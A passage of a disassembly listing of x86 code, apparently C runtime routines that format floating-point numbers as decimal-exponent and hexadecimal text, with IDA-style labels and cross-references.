sub esp, 10h
push esi
push [ebp+arg_4]
lea ecx, [ebp+var_10]
call sub_40271F
mov esi, [ebp+arg_0]
movsx eax, byte ptr [esi]
push eax
call sub_405771
cmp eax, 65h
jmp short loc_4108EC
; ---------------------------------------------------------------------------
loc_4108E0: ; CODE XREF: sub_4108BD+30�j
inc esi
movzx eax, byte ptr [esi]
push eax
call sub_40F17F
test eax, eax
loc_4108EC: ; CODE XREF: sub_4108BD+21�j
pop ecx
jnz short loc_4108E0
movsx eax, byte ptr [esi]
push eax
call sub_405771
cmp eax, 78h
pop ecx
jnz short loc_410900
inc esi
inc esi
loc_410900: ; CODE XREF: sub_4108BD+3F�j
mov ecx, [ebp+var_10]
mov ecx, [ecx+0BCh]
mov ecx, [ecx]
mov al, [esi]
mov cl, [ecx]
mov [esi], cl
inc esi
loc_410912: ; CODE XREF: sub_4108BD+60�j
mov cl, [esi]
mov [esi], al
mov al, cl
mov cl, [esi]
inc esi
test cl, cl
jnz short loc_410912
cmp [ebp+var_4], cl
pop esi
jz short locret_41092C
mov eax, [ebp+var_8]
and dword ptr [eax+70h], 0FFFFFFFDh
locret_41092C: ; CODE XREF: sub_4108BD+66�j
leave
retn
sub_4108BD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41092E proc near ; CODE XREF: sub_410A46+6�p
; DATA XREF: sub_40F70B+4B�o
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push esi
push [ebp+arg_4]
lea ecx, [ebp+var_10]
call sub_40271F
mov eax, [ebp+arg_0]
mov cl, [eax]
test cl, cl
mov esi, [ebp+var_10]
jz short loc_410961
mov edx, [esi+0BCh]
mov edx, [edx]
mov dl, [edx]
loc_410956: ; CODE XREF: sub_41092E+31�j
cmp cl, dl
jz short loc_410961
inc eax
mov cl, [eax]
test cl, cl
jnz short loc_410956
loc_410961: ; CODE XREF: sub_41092E+1C�j
; sub_41092E+2A�j
mov cl, [eax]
inc eax
test cl, cl
jz short loc_41099E
jmp short loc_410975
; ---------------------------------------------------------------------------
loc_41096A: ; CODE XREF: sub_41092E+4B�j
cmp cl, 65h
jz short loc_41097B
cmp cl, 45h
jz short loc_41097B
inc eax
loc_410975: ; CODE XREF: sub_41092E+3A�j
mov cl, [eax]
test cl, cl
jnz short loc_41096A
loc_41097B: ; CODE XREF: sub_41092E+3F�j
; sub_41092E+44�j
mov edx, eax
loc_41097D: ; CODE XREF: sub_41092E+53�j
dec eax
cmp byte ptr [eax], 30h
jz short loc_41097D
mov ecx, [esi+0BCh]
mov ecx, [ecx]
push ebx
mov bl, [eax]
cmp bl, [ecx]
pop ebx
jnz short loc_410994
dec eax
loc_410994: ; CODE XREF: sub_41092E+63�j
; sub_41092E+6E�j
mov cl, [edx]
inc eax
inc edx
test cl, cl
mov [eax], cl
jnz short loc_410994
loc_41099E: ; CODE XREF: sub_41092E+38�j
cmp [ebp+var_4], 0
pop esi
jz short locret_4109AC
mov eax, [ebp+var_8]
and dword ptr [eax+70h], 0FFFFFFFDh
locret_4109AC: ; CODE XREF: sub_41092E+75�j
leave
retn
sub_41092E endp
; ---------------------------------------------------------------------------
word_4109AE dw 0EED9h ; DATA XREF: sub_40F70B+28�o
dd 424448Bh, 0E0DF18DCh, 7A41C4F6h, 40C03304h, 0C3C033C3h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4109C4 proc near ; CODE XREF: sub_410A04+E�p
; DATA XREF: sub_40F70B+41�o
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ecx
cmp [ebp+arg_0], 0
push [ebp+arg_C]
push [ebp+arg_8]
jz short loc_4109EE
lea eax, [ebp+var_8]
push eax
call sub_4114AD
mov ecx, [ebp+var_8]
mov eax, [ebp+arg_4]
mov [eax], ecx
mov ecx, [ebp+var_4]
mov [eax+4], ecx
jmp short loc_4109FF
; ---------------------------------------------------------------------------
loc_4109EE: ; CODE XREF: sub_4109C4+F�j
lea eax, [ebp+arg_0]
push eax
call sub_411553
mov eax, [ebp+arg_4]
mov ecx, [ebp+arg_0]
mov [eax], ecx
loc_4109FF: ; CODE XREF: sub_4109C4+28�j
add esp, 0Ch
leave
retn
sub_4109C4 endp
; =============== S U B R O U T I N E =======================================
sub_410A04 proc near ; DATA XREF: sub_40F70B+14�o
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push 0
push [esp+4+arg_8]
push [esp+8+arg_4]
push [esp+0Ch+arg_0]
call sub_4109C4
add esp, 10h
retn
sub_410A04 endp
; =============== S U B R O U T I N E =======================================
sub_410A1B proc near ; CODE XREF: sub_410A54+88�p
; sub_41101E+8A�p ...
test edi, edi
push esi
mov esi, eax
jz short loc_410A36
push esi
call sub_404130
inc eax
push eax
push esi
add esi, edi
push esi
call sub_407370
add esp, 10h
loc_410A36: ; CODE XREF: sub_410A1B+5�j
pop esi
retn
sub_410A1B endp
; =============== S U B R O U T I N E =======================================
sub_410A38 proc near ; DATA XREF: sub_40F70B+1E�o
arg_0 = dword ptr 4
push 0
push [esp+4+arg_0]
call sub_4108BD
pop ecx
pop ecx
retn
sub_410A38 endp
; =============== S U B R O U T I N E =======================================
sub_410A46 proc near ; DATA XREF: sub_40F70B+A�o
arg_0 = dword ptr 4
push 0
push [esp+4+arg_0]
call sub_41092E
pop ecx
pop ecx
retn
sub_410A46 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410A54 proc near ; CODE XREF: sub_410BC1+B7�p
; sub_4111CC+E1�p
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = byte ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
push edi
push [ebp+arg_14]
lea ecx, [ebp+var_10]
mov ebx, eax
call sub_40271F
xor esi, esi
cmp ebx, esi
jnz short loc_410A9B
loc_410A70: ; CODE XREF: sub_410A54+4A�j
call sub_4057D3
push 16h
loc_410A77: ; CODE XREF: sub_410A54+67�j
pop edi
push esi
push esi
push esi
push esi
push esi
mov [eax], edi
call sub_402F39
add esp, 14h
cmp [ebp+var_4], 0
jz short loc_410A94
mov eax, [ebp+var_8]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_410A94: ; CODE XREF: sub_410A54+37�j
mov eax, edi
jmp loc_410BBC
; ---------------------------------------------------------------------------
loc_410A9B: ; CODE XREF: sub_410A54+1A�j
cmp [ebp+arg_0], esi
jbe short loc_410A70
cmp [ebp+arg_4], esi
jle short loc_410AAA
mov eax, [ebp+arg_4]
jmp short loc_410AAC
; ---------------------------------------------------------------------------
loc_410AAA: ; CODE XREF: sub_410A54+4F�j
xor eax, eax
loc_410AAC: ; CODE XREF: sub_410A54+54�j
add eax, 9
cmp [ebp+arg_0], eax
ja short loc_410ABD
call sub_4057D3
push 22h
jmp short loc_410A77
; ---------------------------------------------------------------------------
loc_410ABD: ; CODE XREF: sub_410A54+5E�j
cmp [ebp+arg_10], 0
jz short loc_410AE1
mov edx, [ebp+arg_C]
xor eax, eax
cmp [ebp+arg_4], esi
setnle al
xor ecx, ecx
cmp dword ptr [edx], 2Dh
setz cl
mov edi, eax
add ecx, ebx
mov eax, ecx
call sub_410A1B
loc_410AE1: ; CODE XREF: sub_410A54+6D�j
mov edi, [ebp+arg_C]
cmp dword ptr [edi], 2Dh
mov esi, ebx
jnz short loc_410AF1
mov byte ptr [ebx], 2Dh
lea esi, [ebx+1]
loc_410AF1: ; CODE XREF: sub_410A54+95�j
cmp [ebp+arg_4], 0
jle short loc_410B0F
lea eax, [esi+1]
mov cl, [eax]
mov [esi], cl
mov esi, eax
mov eax, [ebp+var_10]
mov eax, [eax+0BCh]
mov eax, [eax]
mov al, [eax]
mov [esi], al
loc_410B0F: ; CODE XREF: sub_410A54+A1�j
xor eax, eax
cmp [ebp+arg_10], al
setz al
add eax, [ebp+arg_4]
add esi, eax
cmp [ebp+arg_0], 0FFFFFFFFh
jnz short loc_410B27
or ebx, 0FFFFFFFFh
jmp short loc_410B2C
; ---------------------------------------------------------------------------
loc_410B27: ; CODE XREF: sub_410A54+CC�j
sub ebx, esi
add ebx, [ebp+arg_0]
loc_410B2C: ; CODE XREF: sub_410A54+D1�j
push offset aE000 ; "e+000"
push ebx
push esi
call sub_4076D5
add esp, 0Ch
xor ebx, ebx
test eax, eax
jz short loc_410B4E
push ebx
push ebx
push ebx
push ebx
push ebx
call sub_402E3D
add esp, 14h
loc_410B4E: ; CODE XREF: sub_410A54+EB�j
cmp [ebp+arg_8], ebx
lea ecx, [esi+2]
jz short loc_410B59
mov byte ptr [esi], 45h
loc_410B59: ; CODE XREF: sub_410A54+100�j
mov eax, [edi+0Ch]
inc esi
cmp byte ptr [eax], 30h
jz short loc_410B90
mov eax, [edi+4]
dec eax
jns short loc_410B6D
neg eax
mov byte ptr [esi], 2Dh
loc_410B6D: ; CODE XREF: sub_410A54+112�j
inc esi
cmp eax, 64h
jl short loc_410B7D
cdq
push 64h
pop edi
idiv edi
add [esi], al
mov eax, edx
loc_410B7D: ; CODE XREF: sub_410A54+11D�j
inc esi
cmp eax, 0Ah
jl short loc_410B8D
cdq
push 0Ah
pop edi
idiv edi
add [esi], al
mov eax, edx
loc_410B8D: ; CODE XREF: sub_410A54+12D�j
add [esi+1], al
loc_410B90: ; CODE XREF: sub_410A54+10C�j
test ds:byte_426564, 1
jz short loc_410BAD
cmp byte ptr [ecx], 30h
jnz short loc_410BAD
push 3
lea eax, [ecx+1]
push eax
push ecx
call sub_407370
add esp, 0Ch
loc_410BAD: ; CODE XREF: sub_410A54+143�j
; sub_410A54+148�j
cmp [ebp+var_4], 0
jz short loc_410BBA
mov eax, [ebp+var_8]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_410BBA: ; CODE XREF: sub_410A54+15D�j
xor eax, eax
loc_410BBC: ; CODE XREF: sub_410A54+42�j
pop edi
pop esi
pop ebx
leave
retn
sub_410A54 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410BC1 proc near ; CODE XREF: sub_410C8F+14�p
; sub_4112C4+7C�p
var_2C = dword ptr -2Ch
var_1C = byte ptr -1Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 2Ch
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov edi, [ebp+arg_4]
push 16h
pop esi
push esi
lea ecx, [ebp+var_1C]
push ecx
lea ecx, [ebp+var_2C]
push ecx
push dword ptr [eax+4]
push dword ptr [eax]
call sub_411771
xor ebx, ebx
add esp, 14h
cmp edi, ebx
jnz short loc_410C11
loc_410BF9: ; CODE XREF: sub_410BC1+55�j
call sub_4057D3
push ebx
push ebx
push ebx
push ebx
push ebx
mov [eax], esi
call sub_402F39
add esp, 14h
mov eax, esi
jmp short loc_410C80
; ---------------------------------------------------------------------------
loc_410C11: ; CODE XREF: sub_410BC1+36�j
mov eax, [ebp+arg_8]
cmp eax, ebx
jbe short loc_410BF9
cmp eax, 0FFFFFFFFh
mov esi, [ebp+arg_C]
jnz short loc_410C25
or eax, 0FFFFFFFFh
jmp short loc_410C39
; ---------------------------------------------------------------------------
loc_410C25: ; CODE XREF: sub_410BC1+5D�j
xor ecx, ecx
cmp [ebp+var_2C], 2Dh
setz cl
sub eax, ecx
xor ecx, ecx
cmp esi, ebx
setnle cl
sub eax, ecx
loc_410C39: ; CODE XREF: sub_410BC1+62�j
lea ecx, [ebp+var_2C]
push ecx
lea ecx, [esi+1]
push ecx
push eax
xor eax, eax
cmp [ebp+var_2C], 2Dh
setz al
xor ecx, ecx
cmp esi, ebx
setnle cl
add eax, edi
add ecx, eax
push ecx
call sub_4115F9
add esp, 10h
cmp eax, ebx
jz short loc_410C67
mov [edi], bl
jmp short loc_410C80
; ---------------------------------------------------------------------------
loc_410C67: ; CODE XREF: sub_410BC1+A0�j
push [ebp+arg_14]
lea eax, [ebp+var_2C]
push ebx
push eax
push [ebp+arg_10]
mov eax, edi
push esi
push [ebp+arg_8]
call sub_410A54
add esp, 18h
loc_410C80: ; CODE XREF: sub_410BC1+4E�j
; sub_410BC1+A4�j
mov ecx, [ebp+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn
sub_410BC1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410C8F proc near ; CODE XREF: sub_410CAD+BD�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push 0
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_410BC1
add esp, 18h
pop ebp
retn
sub_410C8F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410CAD proc near ; CODE XREF: sub_4112C4+63�p
var_24 = dword ptr -24h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 24h
push esi
push edi
push [ebp+arg_14]
lea ecx, [ebp+var_24]
mov [ebp+var_14], 3FFh
xor edi, edi
mov [ebp+var_4], 30h
call sub_40271F
cmp [ebp+arg_C], edi
jge short loc_410CD8
mov [ebp+arg_C], edi
loc_410CD8: ; CODE XREF: sub_410CAD+26�j
mov esi, [ebp+arg_4]
cmp esi, edi
jnz short loc_410D0A
loc_410CDF: ; CODE XREF: sub_410CAD+60�j
call sub_4057D3
push 16h
loc_410CE6: ; CODE XREF: sub_410CAD+77�j
pop esi
push edi
push edi
push edi
push edi
push edi
mov [eax], esi
call sub_402F39
add esp, 14h
cmp [ebp+var_18], 0
jz short loc_410D03
mov eax, [ebp+var_1C]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_410D03: ; CODE XREF: sub_410CAD+4D�j
mov eax, esi
jmp loc_41101A
; ---------------------------------------------------------------------------
loc_410D0A: ; CODE XREF: sub_410CAD+30�j
cmp [ebp+arg_8], edi
jbe short loc_410CDF
mov eax, [ebp+arg_C]
add eax, 0Bh
cmp [ebp+arg_8], eax
mov byte ptr [esi], 0
ja short loc_410D26
call sub_4057D3
push 22h
jmp short loc_410CE6
; ---------------------------------------------------------------------------
loc_410D26: ; CODE XREF: sub_410CAD+6E�j
mov edi, [ebp+arg_0]
mov eax, [edi]
mov [ebp+var_C], eax
mov eax, [edi+4]
mov ecx, eax
shr ecx, 14h
mov edx, 7FFh
push ebx
and ecx, edx
xor ebx, ebx
cmp ecx, edx
jnz loc_410DD8
test ebx, ebx
jnz loc_410DD8
mov eax, [ebp+arg_8]
cmp eax, 0FFFFFFFFh
jnz short loc_410D5C
or eax, eax
jmp short loc_410D5F
; ---------------------------------------------------------------------------
loc_410D5C: ; CODE XREF: sub_410CAD+A9�j
add eax, 0FFFFFFFEh
loc_410D5F: ; CODE XREF: sub_410CAD+AD�j
push 0
push [ebp+arg_C]
lea ebx, [esi+2]
push eax
push ebx
push edi
call sub_410C8F
add esp, 14h
test eax, eax
jz short loc_410D8F
cmp [ebp+var_18], 0
mov byte ptr [esi], 0
jz loc_411019
mov ecx, [ebp+var_1C]
and dword ptr [ecx+70h], 0FFFFFFFDh
jmp loc_411019
; ---------------------------------------------------------------------------
loc_410D8F: ; CODE XREF: sub_410CAD+C7�j
cmp byte ptr [ebx], 2Dh
jnz short loc_410D98
mov byte ptr [esi], 2Dh
inc esi
loc_410D98: ; CODE XREF: sub_410CAD+E5�j
mov byte ptr [esi], 30h
inc esi
cmp [ebp+arg_10], 0
push 65h
setz al
dec al
and al, 0E0h
add al, 78h
mov [esi], al
inc esi
push esi
call sub_411480
test eax, eax
pop ecx
pop ecx
jz loc_41100A
cmp [ebp+arg_10], 0
setz cl
dec cl
and cl, 0E0h
add cl, 70h
mov [eax], cl
mov byte ptr [eax+3], 0
jmp loc_41100A
; ---------------------------------------------------------------------------
loc_410DD8: ; CODE XREF: sub_410CAD+95�j
; sub_410CAD+9D�j
and eax, 80000000h
xor ecx, ecx
or ecx, eax
jz short loc_410DE7
mov byte ptr [esi], 2Dh
inc esi
loc_410DE7: ; CODE XREF: sub_410CAD+134�j
mov ebx, [ebp+arg_10]
mov byte ptr [esi], 30h
inc esi
test ebx, ebx
setz al
dec al
and al, 0E0h
add al, 78h
mov [esi], al
mov ecx, [edi+4]
inc esi
neg ebx
sbb ebx, ebx
and ebx, 0FFFFFFE0h
and ecx, 7FF00000h
xor eax, eax
add ebx, 27h
xor edx, edx
or eax, ecx
jnz short loc_410E38
mov byte ptr [esi], 30h
mov ecx, [edi+4]
mov eax, [edi]
and ecx, 0FFFFFh
inc esi
or eax, ecx
jnz short loc_410E2F
mov [ebp+var_14], edx
jmp short loc_410E3C
; ---------------------------------------------------------------------------
loc_410E2F: ; CODE XREF: sub_410CAD+17B�j
mov [ebp+var_14], 3FEh
jmp short loc_410E3C
; ---------------------------------------------------------------------------
loc_410E38: ; CODE XREF: sub_410CAD+168�j
mov byte ptr [esi], 31h
inc esi
loc_410E3C: ; CODE XREF: sub_410CAD+180�j
; sub_410CAD+189�j
mov eax, esi
inc esi
cmp [ebp+arg_C], edx
mov [ebp+arg_4], eax
jnz short loc_410E4B
mov [eax], dl
jmp short loc_410E5A
; ---------------------------------------------------------------------------
loc_410E4B: ; CODE XREF: sub_410CAD+198�j
mov ecx, [ebp+var_24]
mov ecx, [ecx+0BCh]
mov ecx, [ecx]
mov cl, [ecx]
mov [eax], cl
loc_410E5A: ; CODE XREF: sub_410CAD+19C�j
mov ecx, [edi+4]
mov eax, [edi]
and ecx, 0FFFFFh
mov [ebp+var_8], ecx
ja short loc_410E72
cmp eax, edx
jbe loc_410F27
loc_410E72: ; CODE XREF: sub_410CAD+1BB�j
mov [ebp+var_C], edx
mov [ebp+var_8], 0F0000h
loc_410E7C: ; CODE XREF: sub_410CAD+220�j
cmp [ebp+arg_C], 0
jle short loc_410ECF
mov edx, [edi+4]
and edx, [ebp+var_8]
mov eax, [edi]
movsx ecx, word ptr [ebp+var_4]
and eax, [ebp+var_C]
and edx, 0FFFFFh
call sub_4118E0
add ax, 30h
movzx eax, ax
cmp ax, 39h
jbe short loc_410EAB
add eax, ebx
loc_410EAB: ; CODE XREF: sub_410CAD+1FA�j
mov ecx, [ebp+var_8]
sub [ebp+var_4], 4
mov [esi], al
mov eax, [ebp+var_C]
shrd eax, ecx, 4
shr ecx, 4
inc esi
dec [ebp+arg_C]
cmp word ptr [ebp+var_4], 0
mov [ebp+var_C], eax
mov [ebp+var_8], ecx
jge short loc_410E7C
loc_410ECF: ; CODE XREF: sub_410CAD+1D3�j
cmp word ptr [ebp+var_4], 0
jl short loc_410F27
mov edx, [edi+4]
and edx, [ebp+var_8]
mov eax, [edi]
movsx ecx, word ptr [ebp+var_4]
and eax, [ebp+var_C]
and edx, 0FFFFFh
call sub_4118E0
cmp ax, 8
jbe short loc_410F27
lea eax, [esi-1]
loc_410EF9: ; CODE XREF: sub_410CAD+25C�j
mov cl, [eax]
cmp cl, 66h
jz short loc_410F05
cmp cl, 46h
jnz short loc_410F0B
loc_410F05: ; CODE XREF: sub_410CAD+251�j
mov byte ptr [eax], 30h
dec eax
jmp short loc_410EF9
; ---------------------------------------------------------------------------
loc_410F0B: ; CODE XREF: sub_410CAD+256�j
cmp eax, [ebp+arg_4]
jz short loc_410F24
mov cl, [eax]
cmp cl, 39h
jnz short loc_410F1E
add bl, 3Ah
mov [eax], bl
jmp short loc_410F27
; ---------------------------------------------------------------------------
loc_410F1E: ; CODE XREF: sub_410CAD+268�j
inc cl
mov [eax], cl
jmp short loc_410F27
; ---------------------------------------------------------------------------
loc_410F24: ; CODE XREF: sub_410CAD+261�j
inc byte ptr [eax-1]
loc_410F27: ; CODE XREF: sub_410CAD+1BF�j
; sub_410CAD+227�j ...
cmp [ebp+arg_C], 0
jle short loc_410F3E
push [ebp+arg_C]
push 30h
push esi
call sub_407B70
add esp, 0Ch
add esi, [ebp+arg_C]
loc_410F3E: ; CODE XREF: sub_410CAD+27E�j
mov eax, [ebp+arg_4]
cmp byte ptr [eax], 0
jnz short loc_410F48
mov esi, eax
loc_410F48: ; CODE XREF: sub_410CAD+297�j
cmp [ebp+arg_10], 0
mov cl, 34h
setz al
dec al
and al, 0E0h
add al, 70h
mov [esi], al
mov eax, [edi]
mov edx, [edi+4]
inc esi
call sub_4118E0
xor ebx, ebx
and eax, 7FFh
and edx, ebx
sub eax, [ebp+var_14]
push ebx
pop ecx
sbb edx, ecx
js short loc_410F82
jg short loc_410F7C
cmp eax, ebx
jb short loc_410F82
loc_410F7C: ; CODE XREF: sub_410CAD+2C9�j
mov byte ptr [esi], 2Bh
inc esi
jmp short loc_410F8C
; ---------------------------------------------------------------------------
loc_410F82: ; CODE XREF: sub_410CAD+2C7�j
; sub_410CAD+2CD�j
mov byte ptr [esi], 2Dh
inc esi
neg eax
adc edx, ebx
neg edx
loc_410F8C: ; CODE XREF: sub_410CAD+2D3�j
cmp edx, ebx
mov edi, esi
mov byte ptr [esi], 30h
jl short loc_410FB9
mov ecx, 3E8h
jg short loc_410FA0
cmp eax, ecx
jb short loc_410FB9
loc_410FA0: ; CODE XREF: sub_410CAD+2ED�j
push ebx
push ecx
push edx
push eax
call sub_411800
add al, 30h
mov [esi], al
inc esi
cmp esi, edi
mov [ebp+var_10], edx
mov eax, ecx
mov edx, ebx
jnz short loc_410FC4
loc_410FB9: ; CODE XREF: sub_410CAD+2E6�j
; sub_410CAD+2F1�j
test edx, edx
jl short loc_410FDB
jg short loc_410FC4
cmp eax, 64h
jb short loc_410FDB
loc_410FC4: ; CODE XREF: sub_410CAD+30A�j
; sub_410CAD+310�j
push 0
push 64h
push edx
push eax
call sub_411800
add al, 30h
mov [esi], al
mov [ebp+var_10], edx
inc esi
mov eax, ecx
mov edx, ebx
loc_410FDB: ; CODE XREF: sub_410CAD+30E�j
; sub_410CAD+315�j
cmp esi, edi
jnz short loc_410FEA
test edx, edx
jl short loc_411002
jg short loc_410FEA
cmp eax, 0Ah
jb short loc_411002
loc_410FEA: ; CODE XREF: sub_410CAD+330�j
; sub_410CAD+336�j
push 0
push 0Ah
push edx
push eax
call sub_411800
add al, 30h
mov [esi], al
mov [ebp+var_10], edx
inc esi
mov eax, ecx
mov [ebp+var_10], ebx
loc_411002: ; CODE XREF: sub_410CAD+334�j
; sub_410CAD+33B�j
add al, 30h
mov [esi], al
mov byte ptr [esi+1], 0
loc_41100A: ; CODE XREF: sub_410CAD+10B�j
; sub_410CAD+126�j
cmp [ebp+var_18], 0
jz short loc_411017
mov eax, [ebp+var_1C]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_411017: ; CODE XREF: sub_410CAD+361�j
xor eax, eax
loc_411019: ; CODE XREF: sub_410CAD+D0�j
; sub_410CAD+DD�j
pop ebx
loc_41101A: ; CODE XREF: sub_410CAD+58�j
pop edi
pop esi
leave
retn
sub_410CAD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41101E proc near ; CODE XREF: sub_411113+A2�p
; sub_4111CC+C3�p
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
push edi
push [ebp+arg_C]
mov ebx, eax
mov esi, [ebx+4]
mov edi, ecx
lea ecx, [ebp+var_10]
dec esi
call sub_40271F
test edi, edi
jnz short loc_41106B
loc_41103E: ; CODE XREF: sub_41101E+51�j
call sub_4057D3
push 16h
pop esi
mov [eax], esi
xor eax, eax
push eax
push eax
push eax
push eax
push eax
call sub_402F39
add esp, 14h
cmp [ebp+var_4], 0
jz short loc_411064
mov eax, [ebp+var_8]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_411064: ; CODE XREF: sub_41101E+3D�j
mov eax, esi
jmp loc_41110E
; ---------------------------------------------------------------------------
loc_41106B: ; CODE XREF: sub_41101E+1E�j
cmp [ebp+arg_0], 0
jbe short loc_41103E
cmp [ebp+arg_8], 0
jz short loc_41108F
cmp esi, [ebp+arg_4]
jnz short loc_41108F
xor eax, eax
cmp dword ptr [ebx], 2Dh
setz al
add eax, esi
add eax, edi
mov byte ptr [eax], 30h
mov byte ptr [eax+1], 0
loc_41108F: ; CODE XREF: sub_41101E+57�j
; sub_41101E+5C�j
cmp dword ptr [ebx], 2Dh
mov esi, edi
jnz short loc_41109C
mov byte ptr [edi], 2Dh
lea esi, [edi+1]
loc_41109C: ; CODE XREF: sub_41101E+76�j
mov eax, [ebx+4]
xor edi, edi
inc edi
test eax, eax
jg short loc_4110B3
mov eax, esi
call sub_410A1B
mov byte ptr [esi], 30h
inc esi
jmp short loc_4110B5
; ---------------------------------------------------------------------------
loc_4110B3: ; CODE XREF: sub_41101E+86�j
add esi, eax
loc_4110B5: ; CODE XREF: sub_41101E+93�j
cmp [ebp+arg_4], 0
jle short loc_4110FF
mov eax, esi
call sub_410A1B
mov eax, [ebp+var_10]
mov eax, [eax+0BCh]
mov eax, [eax]
mov al, [eax]
mov [esi], al
mov ebx, [ebx+4]
inc esi
test ebx, ebx
jge short loc_4110FF
neg ebx
cmp [ebp+arg_8], 0
jnz short loc_4110E6
cmp [ebp+arg_4], ebx
jl short loc_4110E9
loc_4110E6: ; CODE XREF: sub_41101E+C1�j
mov [ebp+arg_4], ebx
loc_4110E9: ; CODE XREF: sub_41101E+C6�j
mov edi, [ebp+arg_4]
mov eax, esi
call sub_410A1B
push edi
push 30h
push esi
call sub_407B70
add esp, 0Ch
loc_4110FF: ; CODE XREF: sub_41101E+9B�j
; sub_41101E+B9�j
cmp [ebp+var_4], 0
jz short loc_41110C
mov eax, [ebp+var_8]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_41110C: ; CODE XREF: sub_41101E+E5�j
xor eax, eax
loc_41110E: ; CODE XREF: sub_41101E+48�j
pop edi
pop esi
pop ebx
leave
retn
sub_41101E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411113 proc near ; CODE XREF: sub_4112C4+24�p
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_1C = byte ptr -1Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 2Ch
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov edi, [ebp+arg_4]
push 16h
pop esi
push esi
lea ecx, [ebp+var_1C]
push ecx
lea ecx, [ebp+var_2C]
push ecx
push dword ptr [eax+4]
push dword ptr [eax]
call sub_411771
xor ebx, ebx
add esp, 14h
cmp edi, ebx
jnz short loc_411163
loc_41114B: ; CODE XREF: sub_411113+55�j
call sub_4057D3
push ebx
push ebx
push ebx
push ebx
push ebx
mov [eax], esi
call sub_402F39
add esp, 14h
mov eax, esi
jmp short loc_4111BD
; ---------------------------------------------------------------------------
loc_411163: ; CODE XREF: sub_411113+36�j
mov eax, [ebp+arg_8]
cmp eax, ebx
jbe short loc_41114B
cmp eax, 0FFFFFFFFh
jnz short loc_411173
or eax, eax
jmp short loc_41117E
; ---------------------------------------------------------------------------
loc_411173: ; CODE XREF: sub_411113+5A�j
xor ecx, ecx
cmp [ebp+var_2C], 2Dh
setz cl
sub eax, ecx
loc_41117E: ; CODE XREF: sub_411113+5E�j
mov esi, [ebp+arg_C]
lea ecx, [ebp+var_2C]
push ecx
mov ecx, [ebp+var_28]
add ecx, esi
push ecx
push eax
xor eax, eax
cmp [ebp+var_2C], 2Dh
setz al
add eax, edi
push eax
call sub_4115F9
add esp, 10h
cmp eax, ebx
jz short loc_4111A8
mov [edi], bl
jmp short loc_4111BD
; ---------------------------------------------------------------------------
loc_4111A8: ; CODE XREF: sub_411113+8F�j
push [ebp+arg_10]
lea eax, [ebp+var_2C]
push ebx
push esi
push [ebp+arg_8]
mov ecx, edi
call sub_41101E
add esp, 10h
loc_4111BD: ; CODE XREF: sub_411113+4E�j
; sub_411113+93�j
mov ecx, [ebp+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn
sub_411113 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4111CC proc near ; CODE XREF: sub_4112C4+4A�p
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
